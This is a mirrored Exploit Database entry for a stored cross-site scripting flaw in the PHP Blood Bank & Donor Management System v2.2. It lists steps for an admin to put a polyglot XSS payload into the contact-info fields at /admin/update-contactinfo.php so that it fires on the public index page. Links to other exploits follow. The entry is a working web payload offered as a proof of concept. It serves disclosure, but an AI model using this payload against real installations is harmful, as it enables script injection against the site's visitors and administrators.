Blood Bank & Donor Management System using v2.2 – Stored XSS

Exploit Database
105 阅读

作者： SoSPiro

日期： 2024-01-29
类别：
- remote
平台：
- php
来源：https://www.exploit-db.com/exploits/51750/

# Exploit Title: Blood Bank & Donor Management System using v2.2 - Stored XSS

# Application: Blood Donor Management System

# Version: v2.2

# Bugs:Stored XSS

# Technology: PHP

# Vendor Homepage: https://phpgurukul.com/

# Software Link: https://phpgurukul.com/blood-bank-donor-management-system-free-download/

# Date: 12.09.2023

# Author: SoSPiro

# Tested on: Windows

#POC

========================================

1. Login to admin account

2. Go to /admin/update-contactinfo.php

3. Change "Adress" or " Email id " or " Contact Number" inputs and add "/*-/*<code>/*</code>/*'/*"/**/(/* */oNcliCk=alert('1') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e" payload.

4. Go to http://bbdms.local/inedx.php page and XSS will be triggered.

last Exploits
Blood Bank & Donor Management System using v2.2 – Stored XSS的更多信息

Symantec Backup Exec 12.5 – Man In The Middle：
Blue Angel Software Suite – Command Execution：
Novell ZENworks 6.5 – Desktop/Server Management Overflow (Metasploit)：
Cafu 9.06 – Multiple Remote Vulnerabilities：
Dell KACE K1000 – Arbitrary File Upload (Metasploit)：
Microsoft Internet Explorer – Fixed Table Col Span Heap Overflow (MS12-037) (Metasploit)：
HP OpenView Performance Insight Server – Backdoor Account Code Execution (Metasploit)：
Cisco Email Security Appliance (IronPort) C160 – ‘Host’ Header Injection：